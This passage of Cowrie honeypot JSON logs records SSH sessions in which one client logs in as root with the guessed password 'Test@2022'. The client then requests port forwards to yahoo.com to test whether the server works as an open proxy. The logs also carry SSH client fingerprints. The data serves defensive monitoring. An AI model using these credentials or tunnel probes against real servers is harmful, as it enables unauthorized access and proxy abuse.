sa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:55:11.447012Z","src_ip":"213.209.150.239","session":"d2c2b9b51c98"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:55:11.683158Z","src_ip":"213.209.150.239","session":"d2c2b9b51c98"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":26991,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:26991","sensor":"my-vps","timestamp":"2025-08-26T00:55:11.731750Z","session":"d2c2b9b51c98"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:11.778803Z","src_ip":"213.209.150.239","session":"d2c2b9b51c98"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"213.209.150.239","src_port":9603,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:9603","sensor":"my-vps","timestamp":"2025-08-26T00:55:11.913509Z","session":"d2c2b9b51c98"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:11.960650Z","src_ip":"213.209.150.239","session":"d2c2b9b51c98"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:55:12.008643Z","src_ip":"213.209.150.239","session":"d2c2b9b51c98"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":51250,"dst_ip":"1.2.3.4","dst_port":22,"session":"e47e3ba2260c","protocol":"ssh","message":"New connection: 213.209.150.239:51250 (1.2.3.4:22) [session: e47e3ba2260c]","sensor":"my-vps","timestamp":"2025-08-26T00:55:12.064434Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:55:12.065289Z","src_ip":"213.209.150.239","session":"e47e3ba2260c"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:55:12.122034Z","src_ip":"213.209.150.239","session":"e47e3ba2260c"}
{"eventid":"cowrie.login.failed","username":"test","password":"2025","message":"login attempt [test/2025] failed","sensor":"my-vps","timestamp":"2025-08-26T00:55:12.321911Z","src_ip":"27.112.78.170","session":"b79f5c31564b"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:55:12.404209Z","src_ip":"213.209.150.239","session":"e47e3ba2260c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":5882,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:5882","sensor":"my-vps","timestamp":"2025-08-26T00:55:12.461602Z","session":"e47e3ba2260c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:12.518414Z","src_ip":"213.209.150.239","session":"e47e3ba2260c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":23440,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:23440","sensor":"my-vps","timestamp":"2025-08-26T00:55:12.675361Z","session":"e47e3ba2260c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:12.732142Z","src_ip":"213.209.150.239","session":"e47e3ba2260c"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:55:12.791068Z","src_ip":"213.209.150.239","session":"e47e3ba2260c"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":51294,"dst_ip":"1.2.3.4","dst_port":22,"session":"2bbf4d655a67","protocol":"ssh","message":"New connection: 213.209.150.239:51294 (1.2.3.4:22) [session: 2bbf4d655a67]","sensor":"my-vps","timestamp":"2025-08-26T00:55:12.837206Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:55:12.837826Z","src_ip":"213.209.150.239","session":"2bbf4d655a67"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:55:12.885195Z","src_ip":"213.209.150.239","session":"2bbf4d655a67"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:55:13.120541Z","src_ip":"213.209.150.239","session":"2bbf4d655a67"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":30665,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:30665","sensor":"my-vps","timestamp":"2025-08-26T00:55:13.168681Z","session":"2bbf4d655a67"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:13.215886Z","src_ip":"213.209.150.239","session":"2bbf4d655a67"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":29920,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:29920","sensor":"my-vps","timestamp":"2025-08-26T00:55:13.353753Z","session":"2bbf4d655a67"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:13.401256Z","src_ip":"213.209.150.239","session":"2bbf4d655a67"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:55:13.449182Z","src_ip":"213.209.150.239","session":"2bbf4d655a67"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":51335,"dst_ip":"1.2.3.4","dst_port":22,"session":"c1d342d80150","protocol":"ssh","message":"New connection: 213.209.150.239:51335 (1.2.3.4:22) [session: c1d342d80150]","sensor":"my-vps","timestamp":"2025-08-26T00:55:13.495426Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:55:13.496289Z","src_ip":"213.209.150.239","session":"c1d342d80150"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:55:13.543399Z","src_ip":"213.209.150.239","session":"c1d342d80150"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:55:13.595629Z","src_ip":"27.112.78.170","session":"b79f5c31564b"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:55:13.779219Z","src_ip":"213.209.150.239","session":"c1d342d80150"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":11050,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:11050","sensor":"my-vps","timestamp":"2025-08-26T00:55:13.827350Z","session":"c1d342d80150"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:13.874825Z","src_ip":"213.209.150.239","session":"c1d342d80150"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":1129,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:1129","sensor":"my-vps","timestamp":"2025-08-26T00:55:14.009649Z","session":"c1d342d80150"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:14.056951Z","src_ip":"213.209.150.239","session":"c1d342d80150"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:55:14.104815Z","src_ip":"213.209.150.239","session":"c1d342d80150"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":51375,"dst_ip":"1.2.3.4","dst_port":22,"session":"b5c1a36b235c","protocol":"ssh","message":"New connection: 213.209.150.239:51375 (1.2.3.4:22) [session: b5c1a36b235c]","sensor":"my-vps","timestamp":"2025-08-26T00:55:14.151110Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:55:14.151798Z","src_ip":"213.209.150.239","session":"b5c1a36b235c"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:55:14.199526Z","src_ip":"213.209.150.239","session":"b5c1a36b235c"}
{"eventid":"cowrie.session.connect","src_ip":"36.89.28.139","src_port":48900,"dst_ip":"1.2.3.4","dst_port":22,"session":"47e16aecf1c1","protocol":"ssh","message":"New connection: 36.89.28.139:48900 (1.2.3.4:22) [session: 47e16aecf1c1]","sensor":"my-vps","timestamp":"2025-08-26T00:55:14.301554Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:55:14.302321Z","src_ip":"36.89.28.139","session":"47e16aecf1c1"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:55:14.434694Z","src_ip":"213.209.150.239","session":"b5c1a36b235c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":7656,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:7656","sensor":"my-vps","timestamp":"2025-08-26T00:55:14.482882Z","session":"b5c1a36b235c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:55:14.495220Z","src_ip":"36.89.28.139","session":"47e16aecf1c1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:14.530295Z","src_ip":"213.209.150.239","session":"b5c1a36b235c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":12380,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:12380","sensor":"my-vps","timestamp":"2025-08-26T00:55:14.665606Z","session":"b5c1a36b235c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:55:14.712800Z","src_ip":"213.209.150.239","session":"b5c1a36b235c"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:55:14.761508Z","src_ip":"213.209.150.239","session":"b5c1a36b235c"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":51421,"dst_ip":"1.2.3.4","dst_port":22,"session":"7ff1ca178c65","protocol":"ssh","message":"New connection: 213.209.150.239:51421 (1.2.3.4:22) [session: 7ff1ca178c65]","sensor":"my-vps","timestamp":"2025-08-26T00:55:14.807874Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:55:14.808814Z","src_ip":"213.209.150.239","session":"7ff1ca178c65"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","e